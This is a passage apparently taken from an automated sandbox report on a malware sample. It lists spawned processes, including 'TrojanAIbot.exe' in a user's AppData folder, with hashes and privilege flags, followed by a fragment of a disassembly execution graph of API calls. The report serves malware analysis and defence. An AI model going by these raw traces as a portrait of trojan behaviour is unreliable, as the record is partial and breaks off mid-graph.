                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:23
                                                                                                                                                                                                                                                                                                          Start time:04:07:28
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6ef0c0000
                                                                                                                                                                                                                                                                                                          File size:496'640 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:27
                                                                                                                                                                                                                                                                                                          Start time:04:07:30
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\FXSSVC.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\fxssvc.exe
                                                                                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                          File size:1'242'624 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:283D4068FC62E71EA43B248224FAE579
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:28
                                                                                                                                                                                                                                                                                                          Start time:04:07:33
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                                                                                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                          File size:2'354'176 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:AC37DAB395406B7A2E223F34625726DE
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:29
                                                                                                                                                                                                                                                                                                          Start time:04:07:34
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                          File size:1'356'800 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:F20BF005553AB1557724E26FBFDB22C5
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:30
                                                                                                                                                                                                                                                                                                          Start time:04:07:35
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                          File size:1'278'464 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:46966EB01AA74C66C8C45009CAFCA510
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:31
                                                                                                                                                                                                                                                                                                          Start time:04:07:35
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                                                                                                                                                                                                                                                                                          Imagebase:0xe80000
                                                                                                                                                                                                                                                                                                          File size:231'936 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:32
                                                                                                                                                                                                                                                                                                          Start time:04:07:37
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                          File size:1'235'968 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:367BAC61864EA78BE8F89AAEA741C1B2
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:33
                                                                                                                                                                                                                                                                                                          Start time:04:07:38
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\perfhost.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\SysWow64\perfhost.exe
                                                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                                                          File size:1'150'976 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:AFAD48DC29F1CF4A38DCFFCDB37F8BA9
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:34
                                                                                                                                                                                                                                                                                                          Start time:04:07:38
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\Locator.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\locator.exe
                                                                                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                          File size:1'141'248 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:3A5699061E1911C756244F5DD3EFCD56
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:35
                                                                                                                                                                                                                                                                                                          Start time:04:07:40
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\SensorDataService.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\System32\SensorDataService.exe
                                                                                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                          File size:1'846'784 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:A30B8B3725152FFD1FEF45C52D3261B8
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:36
                                                                                                                                                                                                                                                                                                          Start time:04:07:41
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                          File size:1'146'880 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:7D3200FA5E7F0DAE65D4ECB41018A0E8
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:37
                                                                                                                                                                                                                                                                                                          Start time:04:07:42
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\spectrum.exe
                                                                                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                          File size:1'455'616 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:2DDE61D6384346F05BA3DA4D78A1740A
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:39
                                                                                                                                                                                                                                                                                                          Start time:04:07:43
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\OpenSSH\ssh-agent.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\System32\OpenSSH\ssh-agent.exe
                                                                                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                          File size:1'511'424 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:03402E65F6A814316E26E0D2EB369ABC
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:40
                                                                                                                                                                                                                                                                                                          Start time:04:07:43
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\TieringEngineService.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\TieringEngineService.exe
                                                                                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                          File size:1'455'616 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:10F8624709D07DA72863BBB00DFD5D16
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:41
                                                                                                                                                                                                                                                                                                          Start time:04:07:44
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\AgentService.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\AgentService.exe
                                                                                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                          File size:1'801'216 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:FB45B515238278E8D72072D18DD7382C
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:42
                                                                                                                                                                                                                                                                                                          Start time:04:07:45
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\vds.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\System32\vds.exe
                                                                                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                          File size:1'303'552 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:2EE227E57FDD41A436C3DE33802B4D02
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                                          Target ID:44
                                                                                                                                                                                                                                                                                                          Start time:04:07:47
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbengine.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\wbengine.exe"
                                                                                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                          File size:2'164'736 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:21B54458FED133A5634A8ABCCB5B5220
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                                                            Execution Coverage:3%
                                                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:1.2%
                                                                                                                                                                                                                                                                                                            Signature Coverage:3.3%
                                                                                                                                                                                                                                                                                                            Total number of Nodes:1617
                                                                                                                                                                                                                                                                                                            Total number of Limit Nodes:48
                                                                                                                                                                                                                                                                                                            execution_graph 84755 467046 84756 46705d 84755->84756 84766 467136 84755->84766 84757 4671a0 84756->84757 84758 46710d 84756->84758 84759 467199 84756->84759 84768 46706e 84756->84768 84761 41171a 75 API calls 84757->84761 84762 41171a 75 API calls 84758->84762 84789 40e380 VariantClear ctype 84759->84789 84774 4670f3 _memcpy_s 84761->84774 84762->84774 84763 4670d2 84765 41171a 75 API calls 84763->84765 84764 41171a 75 API calls 84764->84766 84767 4670d8 84765->84767 84787 443466 75 API calls 84767->84787 84773 4670a9 ctype 84768->84773 84775 41171a 84768->84775 84771 4670e8 84788 45efe7 77 API calls ctype 84771->84788 84773->84757 84773->84763 84773->84774 84774->84764 84777 411724 84775->84777 84778 41173e 84777->84778 84782 411740 std::bad_alloc::bad_alloc 84777->84782 84790 4138ba 84777->84790 84808 411afc 6 API calls __decode_pointer 84777->84808 84778->84773 84780 411766 84812 4116fd 67 API calls std::exception::exception 84780->84812 84782->84780 84809 411421 84782->84809 84783 411770 84813 41805b RaiseException 84783->84813 84786 41177e 84787->84771 84788->84774 84789->84757 84791 41396d 84790->84791 84802 4138cc 84790->84802 84821 411afc 6 API calls __decode_pointer 84791->84821 84793 413973 84822 417f23 67 API calls __getptd_noexit 84793->84822 84796 413965 84796->84777 84799 413929 RtlAllocateHeap 84799->84802 84800 4138dd 84800->84802 84814 418252 67 API calls 2 library calls 84800->84814 84815 4180a7 67 API calls 7 library calls 84800->84815 84816 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84800->84816 84802->84796 84802->84799 84802->84800 84803 413959 84802->84803 84806 41395e 84802->84806 84817 41386b 67 API calls 4 library calls 84802->84817 84818 411afc 6 API calls __decode_pointer 84802->84818 84819 417f23 67 API calls __getptd_noexit 84803->84819 84820 417f23 67 API calls __getptd_noexit 84806->84820 84808->84777 84823 4113e5 84809->84823 84811 41142e 84811->84780 84812->84783 84813->84786 84814->84800 84815->84800 84817->84802 84818->84802 84819->84806 84820->84796 84821->84793 84822->84796 84824 4113f1 __setmode 84823->84824 84831 41181b 84824->84831 84830 411412 __setmode 84830->84811 84857 418407 84831->84857 84833 4113f6 84834 4112fa 84833->84834 84922 4169e9 TlsGetValue 84834->84922 84837 4169e9 __decode_pointer 6 API calls 84838 41131e 84837->84838 84839 4113a1 84838->84839 84932 4170e7 68 API calls 4 library calls 84838->84932 84854 41141b 84839->84854 84841 41133c 84843 411357 84841->84843 84844 411366 84841->84844 84853 411388 84841->84853 84842 41696e __encode_pointer 6 API calls 84845 411396 84842->84845 84933 417047 73 API calls _realloc 84843->84933 84844->84839 84847 411360 84844->84847 84848 41696e __encode_pointer 6 API calls 84845->84848 84847->84844 84850 41137c 84847->84850 84934 417047 73 API calls _realloc 84847->84934 84848->84839 84935 41696e TlsGetValue 84850->84935 84851 411376 84851->84839 84851->84850 84853->84842 84947 411824 84854->84947 84858 41841c 84857->84858 84859 41842f EnterCriticalSection 84857->84859 84864 418344 84858->84864 84859->84833 84861 418422 84861->84859 84892 4117af 67 API calls 3 library calls 84861->84892 84863 41842e 84863->84859 84865 418350 __setmode 84864->84865 84866 418360 84865->84866 84867 418378 84865->84867 84893 418252 67 API calls 2 library calls 84866->84893 84875 418386 __setmode 84867->84875 84896 416fb6 84867->84896 84870 418365 84894 4180a7 67 API calls 7 library calls 84870->84894 84873 4183a7 84878 418407 __lock 67 API calls 84873->84878 84874 418398 84902 417f23 67 API calls __getptd_noexit 84874->84902 84875->84861 84876 41836c 84895 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84876->84895 84880 4183ae 84878->84880 84882 4183e2 84880->84882 84883 4183b6 84880->84883 84884 413a88 __fcloseall 67 API calls 84882->84884 84903 4189e6 InitializeCriticalSectionAndSpinCount __setmode 84883->84903 84891 4183d3 84884->84891 84886 4183c1 84886->84891 84904 413a88 84886->84904 84889 4183cd 84917 417f23 67 API calls __getptd_noexit 84889->84917 84918 4183fe LeaveCriticalSection _doexit 84891->84918 84892->84863 84893->84870 84894->84876 84899 416fbf 84896->84899 84897 4138ba _malloc 66 API calls 84897->84899 84898 416ff5 84898->84873 84898->84874 84899->84897 84899->84898 84900 416fd6 Sleep 84899->84900 84901 416feb 84900->84901 84901->84898 84901->84899 84902->84875 84903->84886 84906 413a94 __setmode 84904->84906 84905 413b0d __dosmaperr __setmode 84905->84889 84906->84905 84908 418407 __lock 65 API calls 84906->84908 84916 413ad3 84906->84916 84907 413ae8 RtlFreeHeap 84907->84905 84909 413afa 84907->84909 84913 413aab ___sbh_find_block 84908->84913 84921 417f23 67 API calls __getptd_noexit 84909->84921 84911 413aff GetLastError 84911->84905 84912 413ac5 84920 413ade LeaveCriticalSection _doexit 84912->84920 84913->84912 84919 419f9d __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 84913->84919 84916->84905 84916->84907 84917->84891 84918->84875 84919->84912 84920->84916 84921->84911 84923 416a01 84922->84923 84924 416a22 GetModuleHandleW 84922->84924 84923->84924 84925 416a0b TlsGetValue 84923->84925 84926 416a32 84924->84926 84927 416a3d GetProcAddress 84924->84927 84931 416a16 84925->84931 84945 41177f Sleep GetModuleHandleW 84926->84945 84929 41130e 84927->84929 84929->84837 84930 416a38 84930->84927 84930->84929 84931->84924 84931->84929 84932->84841 84933->84847 84934->84851 84936 4169a7 GetModuleHandleW 84935->84936 84937 416986 84935->84937 84939 4169c2 GetProcAddress 84936->84939 84940 4169b7 84936->84940 84937->84936 84938 416990 TlsGetValue 84937->84938 84943 41699b 84938->84943 84942 41699f 84939->84942 84946 41177f Sleep GetModuleHandleW 84940->84946 84942->84853 84943->84936 84943->84942 84944 4169bd 84944->84939 84944->84942 84945->84930 84946->84944 84950 41832d LeaveCriticalSection 84947->84950 84949 411420 84949->84830 84950->84949 84951 444343 84954 444326 84951->84954 84953 44434e WriteFile 84955 444340 84954->84955 84956 4442c7 84954->84956 84955->84953 84961 40e190 SetFilePointerEx 84956->84961 84958 4442e0 SetFilePointerEx 84962 40e190 SetFilePointerEx 84958->84962 84960 4442ff 84960->84953 84961->84958 84962->84960 84963 46d22f 84966 46d098 84963->84966 84965 46d241 84967 46d0b5 84966->84967 84968 46d115 84967->84968 84969 46d0b9 84967->84969 85025 45c216 78 API calls 84968->85025 84970 41171a 75 API calls 84969->84970 84972 46d0c0 84970->84972 84974 46d0cc 84972->84974 85014 40d940 76 API calls 84972->85014 84973 46d126 84975 46d0f8 84973->84975 84981 46d142 84973->84981 85015 453063 84974->85015 85021 4092c0 84975->85021 84979 46d0fd 84979->84965 84982 46d1c8 84981->84982 84984 46d158 84981->84984 85035 4676a3 78 API calls 84982->85035 84987 453063 111 API calls 84984->84987 84985 46d0ea 84985->84981 84988 46d0ee 84985->84988 85001 46d15e 84987->85001 84988->84975 85020 44ade5 CloseHandle ctype 84988->85020 84989 46d1ce 85036 4444c2 SetFilePointerEx SetFilePointerEx WriteFile 84989->85036 84990 46d18d 85026 467fce 82 API calls 84990->85026 84992 46d196 85027 4013a0 84992->85027 84996 46d1e7 84999 4092c0 VariantClear 84996->84999 85008 46d194 84996->85008 84999->85008 85000 46d1ac 85033 40d3b0 75 API calls 2 library calls 85000->85033 85001->84990 85001->84992 85003 46d224 85003->84965 85004 46d1b8 85034 467fce 82 API calls 85004->85034 85007 46d216 85037 44ade5 CloseHandle ctype 85007->85037 85008->85003 85010 40d900 85008->85010 85011 40d917 85010->85011 85012 40d909 85010->85012 85011->85012 85013 40d91c CloseHandle 85011->85013 85012->85007 85013->85007 85014->84974 85016 45306e 85015->85016 85017 45307a 85015->85017 85016->85017 85038 452e2a 111 API calls 5 library calls 85016->85038 85019 40dfa0 83 API calls 85017->85019 85019->84985 85020->84975 85022 4092c8 ctype 85021->85022 85023 429db0 VariantClear 85022->85023 85024 4092d5 ctype 85022->85024 85023->85024 85024->84979 85025->84973 85026->85008 85028 41171a 75 API calls 85027->85028 85029 4013c4 85028->85029 85039 401380 75 API calls 85029->85039 85031 4013d3 85032 40df50 75 API calls 85031->85032 85032->85000 85033->85004 85034->85008 85035->84989 85036->84996 85037->85003 85038->85017 85039->85031 85040 40116e 85041 401119 DefWindowProcW 85040->85041 85042 40f110 RegOpenKeyExW 85043 40f13c RegQueryValueExW RegCloseKey 85042->85043 85044 40f15f 85042->85044 85043->85044 85045 429212 85050 410b90 85045->85050 85048 411421 __cinit 74 API calls 85049 42922f 85048->85049 85051 410b9a __write_nolock 85050->85051 85052 41171a 75 API calls 85051->85052 85053 410c31 GetModuleFileNameW 85052->85053 85067 413db0 85053->85067 85055 410c66 _wcsncat 85070 413e3c 85055->85070 85058 41171a 75 API calls 85059 410ca3 _wcscpy 85058->85059 85060 410cd1 RegOpenKeyExW 85059->85060 85061 429bc3 RegQueryValueExW 85060->85061 85062 410cf7 85060->85062 85063 429cd9 RegCloseKey 85061->85063 85064 429bf2 _wcscat _wcslen _wcsncpy 85061->85064 85062->85048 85065 41171a 75 API calls 85064->85065 85066 429cd8 85064->85066 85065->85064 85066->85063 85073 413b95 85067->85073 85103 41abec 85070->85103 85074 413bae 85073->85074 85075 413c2f 85073->85075 85074->85075 85091 413c1d 85074->85091 85095 41ab19 67 API calls __setmode 85074->85095 85076 413d60 85075->85076 85077 413d7b 85075->85077 85099 417f23 67 API calls __getptd_noexit 85076->85099 85101 417f23 67 API calls __getptd_noexit 85077->85101 85080 413d65 85082 413cfb 85080->85082 85100 417ebb 6 API calls 2 library calls 85080->85100 85082->85055 85084 413d03 85084->85075 85084->85082 85087 413d8e 85084->85087 85085 413cb9 85085->85075 85086 413cd6 85085->85086 85097 41ab19 67 API calls __setmode 85085->85097 85086->85075 85086->85082 85090 413cef 85086->85090 85102 41ab19 67 API calls __setmode 85087->85102 85098 41ab19 67 API calls __setmode 85090->85098 85091->85075 85094 413c9b 85091->85094 85096 41ab19 67 API calls __setmode 85091->85096 85094->85084 85094->85085 85095->85091 85096->85094 85097->85086 85098->85082 85099->85080 85101->85080 85102->85082 85104 41ac02 85103->85104 85105 41abfd 85103->85105 85112 417f23 67 API calls __getptd_noexit 85104->85112 85105->85104 85110 41ac22 85105->85110 85109 410c99 85109->85058 85110->85109 85114 417f23 67 API calls __getptd_noexit 85110->85114 85111 41ac07 85113 417ebb 6 API calls 2 library calls 85111->85113 85112->85111 85114->85111 85115 401230 85116 401241 _memset 85115->85116 85117 4012c5 85115->85117 85130 401be0 85116->85130 85119 40126b 85120 4012ae KillTimer SetTimer 85119->85120 85121 42aa61 85119->85121 85122 401298 85119->85122 85120->85117 85125 42aa8b Shell_NotifyIconW 85121->85125 85126 42aa69 Shell_NotifyIconW 85121->85126 85123 4012a2 85122->85123 85124 42aaac 85122->85124 85123->85120 85127 42aaf8 Shell_NotifyIconW 85123->85127 85128 42aad7 Shell_NotifyIconW 85124->85128 85129 42aab5 Shell_NotifyIconW 85124->85129 85125->85120 85126->85120 85127->85120 85128->85120 85129->85120 85131 401bfb 85130->85131 85151 401cde 85130->85151 85132 4013a0 75 API calls 85131->85132 85133 401c0b 85132->85133 85134 42a9a0 LoadStringW 85133->85134 85135 401c18 85133->85135 85137 42a9bb 85134->85137 85152 4021e0 85135->85152 85165 40df50 75 API calls 85137->85165 85138 401c2d 85140 401c3a 85138->85140 85141 42a9cd 85138->85141 85140->85137 85142 401c44 85140->85142 85166 40d3b0 75 API calls 2 library calls 85141->85166 85164 40d3b0 75 API calls 2 library calls 85142->85164 85145 42a9dc 85146 42a9f0 85145->85146 85147 401c53 _memset _wcscpy _wcsncpy 85145->85147 85167 40d3b0 75 API calls 2 library calls 85146->85167 85150 401cc2 Shell_NotifyIconW 85147->85150 85149 42a9fe 85150->85151 85151->85119 85153 4021f1 _wcslen 85152->85153 85154 42a598 85152->85154 85157 402205 85153->85157 85158 402226 85153->85158 85170 40c740 85154->85170 85156 42a5a2 85168 404020 75 API calls ctype 85157->85168 85169 401380 75 API calls 85158->85169 85161 40220c _memcpy_s 85161->85138 85162 40222d 85162->85156 85163 41171a 75 API calls 85162->85163 85163->85161 85164->85147 85165->85147 85166->85145 85167->85149 85168->85161 85169->85162 85171 40c752 85170->85171 85172 40c747 85170->85172 85171->85156 85172->85171 85175 402ae0 75 API calls _memcpy_s 85172->85175 85174 42a572 _memcpy_s 85174->85156 85175->85174 85176 4034b0 85177 4034b9 85176->85177 85178 4034bd 85176->85178 85179 41171a 75 API calls 85178->85179 85180 42a0ba 85178->85180 85181 4034fe _memcpy_s ctype 85179->85181 85182 416193 85219 41718c 85182->85219 85184 41619f GetStartupInfoW 85187 4161c2 85184->85187 85220 41aa31 HeapCreate 85187->85220 85188 416212 85222 416e29 GetModuleHandleW 85188->85222 85192 416223 __RTC_Initialize 85256 41b669 85192->85256 85195 416231 85196 41623d GetCommandLineW 85195->85196 85325 4117af 67 API calls 3 library calls 85195->85325 85271 42235f GetEnvironmentStringsW 85196->85271 85199 41623c 85199->85196 85200 41624c 85277 4222b1 GetModuleFileNameW 85200->85277 85202 416256 85203 416261 85202->85203 85326 4117af 67 API calls 3 library calls 85202->85326 85281 422082 85203->85281 85207 416272 85294 41186e 85207->85294 85210 416279 85212 416284 __wwincmdln 85210->85212 85328 4117af 67 API calls 3 library calls 85210->85328 85300 40d7f0 85212->85300 85215 4162b3 85330 411a4b 67 API calls _doexit 85215->85330 85218 4162b8 __setmode 85219->85184 85221 416206 85220->85221 85221->85188 85323 41616a 67 API calls 3 library calls 85221->85323 85223 416e44 85222->85223 85224 416e3d 85222->85224 85226 416fac 